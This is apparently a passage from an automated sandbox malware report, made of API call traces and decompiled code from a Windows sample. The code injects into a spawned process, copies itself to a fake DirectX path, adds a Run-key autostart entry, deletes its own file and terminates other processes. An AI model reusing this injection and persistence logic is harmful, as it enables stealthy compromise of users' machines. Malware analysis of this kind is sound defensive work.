    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
